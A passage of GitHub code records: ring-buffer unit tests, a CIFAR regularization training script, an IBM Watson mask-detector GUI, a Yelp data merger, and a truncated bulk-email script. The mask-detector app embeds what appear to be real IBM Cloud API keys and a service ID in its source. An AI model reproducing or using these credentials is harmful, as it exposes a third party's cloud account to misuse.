q.capacity())\r\n\r\n # UniversalContainer3 wird n-mal gepushed und mit popLast() (n+1)-mal gepopped.\r\n # Das letzte popLast() muss eine Exception ausloesen (leere UniversalContainer3).\r\n def testPopLast(self):\r\n for y in range(0,100):\r\n q = UniversalContainer3()\r\n for i in range(0, y):\r\n q.push(i)\r\n\r\n for i in range(y, 0, -1):\r\n self.assertEqual(q.size(), i)\r\n self.assertEqual(q.last(), i-1)\r\n q.popLast()\r\n\r\n self.assertEqual(q.size(), 0)\r\n self.assertRaises(RuntimeError, q.popLast)\r\n\r\n # UniversalContainer3 wird n-mal gepushed und mit popFirst() (n+1)-mal gepopped.\r\n # Das letzte popFirst() muss eine Exception ausloesen (leere UniversalContainer3).\r\n def testPopFirst(self):\r\n for y in range(0,100):\r\n q = UniversalContainer3()\r\n for i in range(0, y):\r\n q.push(i)\r\n\r\n for i in range(y, 0, -1):\r\n self.assertEqual(q.size(), i)\r\n self.assertEqual(q.first(), y-i)\r\n q.popFirst()\r\n\r\n self.assertEqual(q.size(), 0)\r\n self.assertRaises(RuntimeError, q.popFirst)\r\n\r\n # push(), popFirst() und popLast() werden in zufaelliger Kombination\r\n # getestet. 
Dies wird 10-mal wiederholt.\r\n # (Wir fuellen die UniversalContainer3 am Anfang mit 115 Elementen, so dass ein\r\n # Fehler wegen leerer UniversalContainer3 praktisch ausgeschlossen ist.)\r\n def testRand(self):\r\n for k in range(10):\r\n q = UniversalContainer3()\r\n sizeCount = 115\r\n for i in range(sizeCount):\r\n q.push(i)\r\n self.assertEqual(q.size(), sizeCount)\r\n\r\n for i in range(400):\r\n dec = random.randint(0,3)\r\n if dec <= 1:\r\n q.push(None)\r\n sizeCount += 1\r\n elif dec == 2:\r\n q.popFirst()\r\n sizeCount -= 1\r\n elif dec == 3:\r\n q.popLast()\r\n sizeCount -= 1\r\n self.assertEqual(q.size(), sizeCount)\r\n\r\n # Teste, ob die Implementation des Rings korrekt ist.\r\n def testShiftRight(self):\r\n q = UniversalContainer3()\r\n\r\n # 10 Elemente einfuegen\r\n for i in range(0,10):\r\n q.push(i)\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 10)\r\n self.assertEqual(q.first_, 0)\r\n self.assertEqual(q.last_, 10)\r\n\r\n # die ersten 6 Elemente entfernen\r\n for i in range(0,6):\r\n q.popFirst()\r\n self.assertEqual(q.size(), 4)\r\n self.assertLess(q.first_, q.last_)\r\n\r\n # weitere 10 Elemente einfuegen => last_\r\n # ueberschreitet die Arraygrenze und ist jetzt\r\n # kleiner als first_\r\n for i in range(0,10):\r\n q.push(i)\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 14)\r\n self.assertGreater(q.first_, q.last_)\r\n\r\n # 6 Elemente am Ende entfernen => last_\r\n # ueberschreitet die Arraygrenze in der anderen\r\n # Richtung und ist wieder groesser als first_\r\n for i in range(0,6):\r\n q.popLast()\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 8)\r\n self.assertLess(q.first_, q.last_)\r\n\r\n # die uebrigen Elemente am Ende entfernen =>\r\n # UniversalContainer3 muss jetzt leer sein\r\n for i in range(0,8):\r\n q.popLast()\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 0)\r\n self.assertEqual(q.first_, q.last_)\r\n\r\n # weiteres Entfernen muss Exception ausloesen\r\n self.assertRaises(RuntimeError, q.popFirst)\r\n self.assertRaises(RuntimeError, q.popLast)\r\n\r\n # 14 neue Elemente einfuegen => last_\r\n # ueberschreitet die Arraygrenze erneut und\r\n # ist kleiner als first_\r\n for i in range(0,14):\r\n q.push(i)\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 14)\r\n self.assertGreater(q.first_, q.last_)\r\n\r\n # 11 Elemente am Anfang entfernen => first_\r\n # ueberschreitet die Arraygrenze ebenfalls und\r\n # ist nun wieder kleiner als last_\r\n for i in range(0,11):\r\n q.popFirst()\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 3)\r\n self.assertLess(q.first_, q.last_)\r\n\r\n # die uebrigen Elemente am Anfang entfernen =>\r\n # UniversalContainer3 muss jetzt leer sein\r\n for i in range(0,3):\r\n q.popFirst()\r\n self.assertEqual(q.capacity(), 16)\r\n self.assertEqual(q.size(), 0)\r\n self.assertEqual(q.first_, q.last_)\r\n\r\n # weiteres Entfernen muss Exception ausloesen\r\n self.assertRaises(RuntimeError, q.popFirst)\r\n self.assertRaises(RuntimeError, q.popLast)\r\n\r\n # 20 neue Elemente einfuegen => das interne Array wird\r\n # verdoppelt, first_ und last_ daher zurueckgesetzt\r\n for i in range(0,20):\r\n q.push(i)\r\n self.assertEqual(q.capacity(), 32)\r\n self.assertEqual(q.size(), 20)\r\n self.assertEqual(q.first_, 0)\r\n self.assertEqual(q.last_, 20)\r\n\r\ndef examples():\r\n test = UniversalContainer3()\r\n test.push(1)\r\n test.push(2)\r\n test.push(3)\r\n print(\"before:\", test, \"first:\", 
test.first())\r\n test.popFirst()\r\n print(\" after popFirst():\", test)\r\n test.push(4)\r\n print(\" after push(4):\", test, \"first:\", test.first())\r\n test.popFirst()\r\n print(\" after popFirst():\", test)\r\n test.push(5)\r\n print(\" after push(5):\", test, \"first:\", test.first())\r\n test.popFirst()\r\n print(\" after popFirst():\", test)\r\n test.push(6)\r\n print(\" after push(6):\", test, \"last:\", test.last())\r\n test.popLast()\r\n print(\" after popLast():\", test, \"last:\", test.last())\r\n test.popLast()\r\n try:\r\n print(\" after popLast():\", test, \"last:\", test.last())\r\n except:\r\n print(\"UniversalContainer3 empty!\")\r\n\r\ndef timingPush():\r\n push = '''\r\nfor i in range(N):\r\n c.push(i)\r\n'''\r\n pop = '''\r\nfor i in range(N):\r\n c.popFirst()\r\n'''\r\n repeats = 5\r\n scope = globals()\r\n for m in range(1,4):\r\n variant = \"ringbuffer.UniversalContainer%d\" % m\r\n print(variant, \"push\")\r\n for k in range(5,11):\r\n N = 2**k\r\n scope['N'] = N\r\n t = timeit.Timer(push, \"c = %s()\" % variant , globals=scope)\r\n time = min(t.repeat(repeats, 1))\r\n print(\"N = %4d\" % N, \"total: %f ms,\" % (time*1000), \"amortized: %f us\" % (time/N*1e6))\r\n for m in range(1,4):\r\n variant = \"ringbuffer.UniversalContainer%d\" % m\r\n print(variant, \"popFirst\")\r\n for k in range(5,11):\r\n N = 2**k\r\n scope['N'] = N\r\n t = timeit.Timer(pop, (\"c = %s()\\n\" % variant) + push, globals=scope)\r\n time = min(t.repeat(repeats, 1))\r\n print(\"N = %4d\" % N, \"total: %f ms,\" % (time*1000), \"amortized: %f us\" % (time/N*1e6))\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Running UniversalContainer3 examples:\")\r\n examples()\r\n\r\n print(\"\\nTiming\\n------\")\r\n timingPush()\r\n\r\n print(\"\\nRunning tests\\n-------------\")\r\n unittest.main()\r\n","repo_name":"koebi/alda_ss19","sub_path":"loesungen/zettel04/ringbuffer.py","file_name":"ringbuffer.py","file_ext":"py","file_size_in_byte":17150,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
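Variant 3 is the one worth keeping: doubling the capacity plus wrap-around indices makes push() and popFirst() amortized O(1), whereas Variants 1 and 2 pay O(n) per popFirst() for the front shift (and Variant 1 additionally O(n) per push for the one-element regrow). Python's standard library ships the same idea as collections.deque; a short comparison sketch of the equivalent operations:

from collections import deque

d = deque()
for i in range(5):
    d.append(i)              # push at the end
d.popleft()                  # popFirst without shifting: O(1)
d.pop()                      # popLast
print(list(d), d[0], d[-1])  # remaining contents, first, last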
+{"seq_id":"17427267052","text":"import torch\nimport torch.nn as nn\nfrom tqdm import tqdm\n\nfrom utils import load_data\nfrom models import ResNet18, ResNet50, ResNet152, CIFAR_CNN\n\n\nMETHOD = 'jac-reg' # jacobian regularization\nLAMDA_ALPHA = 100.0\n\n#METHOD = 'last-reg' # last layer regularization\n#LAMDA_ALPHA = 0.01\n\nmodel_arch = 'cifarcnn'\n#model_arch = 'resnet18'\n\nSAVE_PATH='./saved_model/%s-%.4f.pth'%(METHOD,LAMDA_ALPHA)\nif model_arch != 'resnet18':\n SAVE_PATH = SAVE_PATH[:-4] + '-%s'%model_arch + '.pth'\nprint (SAVE_PATH)\n\ntrainset, testset, trainloader, testloader, normalizer = load_data()\nprint (len(trainset), len(testset))\n\nif model_arch == 'resnet18':\n model = ResNet18(normalizer, dropout=0.0)\nelif model_arch == 'cifarcnn':\n model = CIFAR_CNN(normalizer, dropout=0.0)\nmodel = model.to('cuda')\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=(0.01 if model_arch == 'cifarcnn' else 0.1), momentum=0.9, weight_decay=5e-4)\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[100,150], gamma=0.1)\n\ndef train(epoch):\n print('\\nEpoch: %d' % epoch)\n model.train()\n train_loss = 0\n train_loss_reg = 0\n correct = 0\n total = 0\n with tqdm(trainloader) as pbar:\n for batch_idx, (x, y) in enumerate(pbar):\n x, y = x.to('cuda'), y.to('cuda')\n x.requires_grad_()\n\n features = model.calc_representation(x)\n pred = model.linear(features)\n loss = criterion(pred, y)\n\n if METHOD == 'jac-reg':\n tgt_val = features.norm(2, dim=1).mean()\n tgt_val.backward(create_graph=True)\n loss_reg = x.grad.view(x.shape[0], -1).norm(2, dim=1).mean()\n elif METHOD == 'last-reg':\n loss_reg = model.linear.weight.view(-1).norm()\n tgt_val = None\n else:\n raise NotImplementedError()\n loss = loss + LAMDA_ALPHA * loss_reg\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n train_loss += loss.item()\n train_loss_reg += loss_reg.item()\n _, pred_c = pred.max(1)\n total += y.size(0)\n correct += pred_c.eq(y).sum().item()\n pbar.set_description('Loss: %.3f | Loss_reg: %.3f | Acc:%.3f%%'%(train_loss/(batch_idx+1), train_loss_reg/(batch_idx+1), 100.*correct/total))\n del tgt_val\n del loss_reg\n del x.grad\n torch.cuda.empty_cache()\n\n acc = 100.*correct/total\n return train_loss/len(trainloader), acc\n\ndef test(epoch):\n model.eval()\n test_loss = 0\n correct = 0\n total = 0\n with torch.no_grad(), tqdm(testloader) as pbar:\n for batch_idx, (x, y) in enumerate(pbar):\n x, y = x.to('cuda'), y.to('cuda')\n pred = model(x)\n loss = criterion(pred, y)\n\n test_loss += loss.item()\n _, pred_c = pred.max(1)\n total += y.size(0)\n correct += pred_c.eq(y).sum().item()\n pbar.set_description('Loss: %.3f | Acc:%.3f%%'%(test_loss/(batch_idx+1), 100.*correct/total))\n\n acc = 100.*correct/total\n return test_loss/len(testloader), acc\n\n\nbest_acc = 0.0\nfor epoch in range(200):\n train(epoch)\n _, cur_acc = test(epoch)\n scheduler.step()\n if cur_acc > best_acc:\n best_acc = cur_acc\n torch.save(model.state_dict(), SAVE_PATH)\n","repo_name":"AI-secure/transferability-versus-robustness","sub_path":"train_reg.py","file_name":"train_reg.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"19915783278","text":"from ibm_watson import VisualRecognitionV3\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nimport json\nimport os\nimport shutil\nimport ibm_boto3\nfrom ibm_botocore.client import Config\nfrom zipfile import ZipFile\nfrom tkinter import *\nimport tkinter.font as font\nfrom tkinter.filedialog import askdirectory\nfrom PIL import ImageTk, Image\nfrom datetime import date\n\n# set watson vr service credentials\niam = IAMAuthenticator(\"8u43aL-G3G-dNVCwDRCM8k_G7J_zBFxR3fY3hmSOmsGV\")\nvr = VisualRecognitionV3(\n version= \"2018-03-19\",\n authenticator = iam\n)\nvr.set_service_url(\"https://api.eu-de.visual-recognition.watson.cloud.ibm.com/instances/f2070f39-5b4b-42c1-a37c-8344e52040e8\")\n\n# function to browse, classify local images\ndef classifyLocal():\n dir = './no-mask/'\n if os.path.exists(dir):\n shutil.rmtree(dir)\n os.makedirs(dir)\n location = askdirectory()\n for file in os.listdir(location):\n if file.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')) :\n result=vr.classify(classifier_ids=\"ClassificationModel_885635333\",threshold='0.6',images_file=open(location+\"/\"+file,\"rb\")).get_result()\n print(json.dumps(result, indent=2))\n if float(result[\"images\"][0][\"classifiers\"][0][\"classes\"][0][\"score\"]) >= 0.9:\n print(\"image contains \"+result[\"images\"][0][\"classifiers\"][0][\"classes\"][0][\"class\"])\n if result[\"images\"][0][\"classifiers\"][0][\"classes\"][0][\"class\"] == \"no mask\":\n shutil.copy(location+\"/\"+file,dir)\n print(\"send to cloud\")\n else: print(\"bad image, cannot classify\")\n else: print(\"not an image file error\")\n print(\"classification complete\")\n notif1=Label(text=\"Classification Complete!\",fg=\"green\")\n notif1.pack()\n\n# function to upload classified folder to cloud object storage\ndef upload():\n cos = ibm_boto3.client(service_name='s3',ibm_api_key_id=\"TOcnjLwKhBWfhiONJJjoeyQAVLOejD63dHlGzQFlsoah\",\n ibm_service_instance_id=\"crn:v1:bluemix:public:iam-identity::a/b3dd5352f75d455d8b3196a7543276eb::serviceid:ServiceId-5f6c7a2b-9d4a-4ec4-b6a6-cdbce4be228f\",\n config=Config(signature_version='oauth'),endpoint_url=\"https://s3.eu.cloud-object-storage.appdomain.cloud\")\n # create a ZipFile object\n with ZipFile('no-mask.zip', 'w') as zipObj:\n for image in os.listdir(\"./no-mask/\"):\n # Add file to zip\n zipObj.write(\"./no-mask/\"+image )\n d1 = date.today().strftime(\"%d/%m/%Y\")\n try:\n res = cos.upload_file('./no-mask.zip',Bucket='maskdetector-donotdelete-pr-2vtgzmmygdbdsb', Key='result-'+d1+'.zip')\n except Exception as e:\n print(Exception, e)\n else:\n print('File Uploaded')\n notif2=Label(text=\"Upload Complete!\",fg=\"green\")\n notif2.pack()\n\n# function to download prev results from cloud\ndef download():\n cos = ibm_boto3.client(service_name='s3',ibm_api_key_id=\"TOcnjLwKhBWfhiONJJjoeyQAVLOejD63dHlGzQFlsoah\",\n ibm_service_instance_id=\"crn:v1:bluemix:public:iam-identity::a/b3dd5352f75d455d8b3196a7543276eb::serviceid:ServiceId-5f6c7a2b-9d4a-4ec4-b6a6-cdbce4be228f\",\n config=Config(signature_version='oauth'),endpoint_url=\"https://s3.eu.cloud-object-storage.appdomain.cloud\")\n try:\n res2 = cos.download_file(Bucket='maskdetector-donotdelete-pr-2vtgzmmygdbdsb',Key='result-'+resdate.get()+'.zip',Filename='./downloaded-results.zip')\n except Exception as e:\n print(Exception, e)\n notif4=Label(text=\"Date not found!\",fg=\"red\")\n notif4.pack()\n else:\n print('File Downloaded')\n notif3=Label(text=\"Download Complete!\",fg=\"green\")\n 
notif3.pack()\n\n# >> tkinter gui code from this point >>\nroot = Tk()\nroot.title(\"Mask Detector\")\n\n# set app icon\np1 = PhotoImage(file = \"icon.png\")\nroot.iconphoto(False, p1)\n\n# set window size\nw, h = root.winfo_screenwidth(), root.winfo_screenheight()-70\nroot.geometry(\"%dx%d+0+0\" % (w/2, h))\n\nimg = ImageTk.PhotoImage(Image.open(\"banner.png\"))\npanel = Label(root, image = img)\npanel.pack(side = \"top\", fill = \"both\")\n\nwelcome = Label(root,text=\"Mask Detector\")\nwelcome[\"font\"] = font.Font(family='Courier', size=30, weight='bold')\nwelcome.pack()\n\nstep1 = Label(text=\"Step 1: Browse the folder containing the images for classification\",fg=\"#0F216C\",highlightbackground='red')\nstep1.pack()\n\nbutton0 = Button(root, text=\"[ Browse ]\", command=classifyLocal)\nbutton0.pack(side=TOP)\n\nstep2 = Label(text=\"\\nStep 2: Do you want to upload the results to the cloud?\",fg=\"#0F216C\")\nstep2.pack()\n\nbutton1 = Button(root, text=\"[ Upload ]\", command=upload)\nbutton1.pack(side=TOP)\n\nstep3 = Label(text=\"\\nStep 3: Download previous results.\\n Please enter the date (dd/mm/yyyy) for which you need results\",fg=\"#0F216C\")\nstep3.pack()\n\nresdate = Entry(root)\nresdate.pack()\n\nbutton2 = Button(root, text=\"[ Download ]\", command=download)\nbutton2.pack(side=TOP)\n\nlog = Label(text=\"\\nLog:\",fg=\"#0F216C\")\nlog.pack()\n\nroot.mainloop()\n","repo_name":"sneha-meto/Mask-Detector","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
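classifyLocal above indexes result["images"][0]["classifiers"][0]["classes"][0] directly, which raises IndexError or KeyError whenever the service returns no class above the threshold. A defensive accessor sketch (a hypothetical helper, not part of the app):

def top_class(result):
    # Return (class_name, score) for the highest-scoring class,
    # or None when the response carries no usable classification.
    try:
        classes = result["images"][0]["classifiers"][0]["classes"]
        best = max(classes, key=lambda c: c["score"])
        return best["class"], float(best["score"])
    except (KeyError, IndexError, ValueError):
        return None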
+{"seq_id":"4664785160","text":"import os\nimport json\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n '-bm', '--business_meta', required=True, help=\"Business metadata\"\n)\nparser.add_argument(\n '-um', '--user_meta', required=True, help=\"User info metadata\"\n)\nparser.add_argument(\n '-r', '--review', required=True, help=\"Review file\"\n)\nparser.add_argument(\n '-f', '--folder', required=True, help=\"Folder to write outputs\"\n)\nargs = parser.parse_args()\n\n\"\"\"\nAttributes to collect\n\n1. Review content\n2. Reviewer name\n3. Review score\n4. Business categories\n\"\"\"\n\n# First Read the meta-data and collect everything into a dictionary.\n\nb_meta_dict = {}\nb_meta_file = open(args.business_meta, 'r')\nprint('Processing Business metadata file ...')\nfor idx, line in enumerate(b_meta_file):\n if idx % 100000 == 0:\n print('Finished %d lines ' % (idx))\n parsed_line = json.loads(line)\n if 'categories' in parsed_line:\n categories = parsed_line['categories']\n b_meta_dict[parsed_line['business_id']] = categories\n\nu_meta_dict = {}\nu_meta_file = open(args.user_meta, 'r')\nprint('Processing User metadata file ...')\nfor idx, line in enumerate(u_meta_file):\n if idx % 100000 == 0:\n print('Finished %d lines ' % (idx))\n parsed_line = json.loads(line)\n if 'name' in parsed_line:\n name = parsed_line['name']\n u_meta_dict[parsed_line['user_id']] = name\n\nf_rev = open(os.path.join(args.folder, 'reviews.txt'), 'w')\nf_rev_name = open(os.path.join(args.folder, 'reviewer_name.txt'), 'w')\nf_score = open(os.path.join(args.folder, 'scores.txt'), 'w')\nf_cat = open(os.path.join(args.folder, 'categories.txt'), 'w')\n\nreview_file = open(args.review, 'r')\nprint('Processing review file ...')\nfor idx, line in enumerate(review_file):\n if idx % 100000 == 0:\n print('Finished %d lines ' % (idx))\n parsed_line = json.loads(line)\n uid = parsed_line['user_id']\n bid = parsed_line['business_id']\n review = parsed_line['text'].replace('\\n', '')\n score = str(parsed_line['stars'])\n if uid in u_meta_dict:\n uname = u_meta_dict[uid]\n else:\n uname = 'N/A'\n if bid in b_meta_dict and b_meta_dict[bid] is not None:\n bcat = '\\t'.join(b_meta_dict[bid].split(', '))\n else:\n bcat = 'N/A'\n f_rev.write(review.strip() + '\\n')\n f_rev_name.write(uname.strip() + '\\n')\n f_score.write(str(score) + '\\n')\n f_cat.write(bcat + '\\n')\n\nf_rev.close()\nf_rev_name.close()\nf_score.close()\nf_cat.close()\n","repo_name":"facebookresearch/MultipleAttributeTextRewriting","sub_path":"data/Yelp/merge_yelp.py","file_name":"merge_yelp.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"90"}
+{"seq_id":"31223235860","text":"import smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email import encoders\r\nimport os\r\nfrom sys import *\r\nimport pandas as pd\r\n\r\ndef Send_Email(Dir_Name):\r\n email = 'abhi.dlv007@gmail.com'\r\n password = input(\"Enter password : \")\r\n Database_File = pd.read_excel('C:\\\\Users\\\\lenovo\\\\Desktop\\\\A\\\\B\\\\Database of Email.xlsx') #This reads the data of email id from the excel file present on path\r\n Receipient_obj = Database_File['Email_ID']\r\n Receipient_list = [] #Empty list to store the email id\r\n\r\n # for loop to create receipients email list\r\n for i in range(len(Receipient_obj)):\r\n # for every record get the the email addresses\r\n mail_id = Receipient_obj[i]\r\n Receipient_list.append(mail_id)\r\n\r\n # Email Body formation\r\n subject = 'Email by Automation Script Multiple receipients and attachments through database file'\r\n message = \"\"\"\r\n \r\n \r\n
Hello sir, \r\n Good Evening.😀
 \r\n I am sending this email to multiple recipients with an automated script and attaching multiple files present in my secondary storage device directory. \r\n The directory name is taken from the user as a command line argument \r\n Recipients' email IDs are taken from the Database.xlsx file \r\n
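The record is cut off before the attachment logic, but the imports (MIMEBase, encoders) point at the standard pattern for attaching every file in Dir_Name to the MIMEMultipart message. A generic sketch of that pattern — an assumption about where the script is headed, not its actual remaining code:

import os
from email.mime.base import MIMEBase
from email import encoders

def attach_directory(msg, dir_name):
    # Attach every regular file found in dir_name to a MIMEMultipart message.
    for fname in os.listdir(dir_name):
        path = os.path.join(dir_name, fname)
        if not os.path.isfile(path):
            continue
        part = MIMEBase('application', 'octet-stream')
        with open(path, 'rb') as fh:
            part.set_payload(fh.read())
        encoders.encode_base64(part)
        part.add_header('Content-Disposition',
                        'attachment; filename="%s"' % fname)
        msg.attach(part)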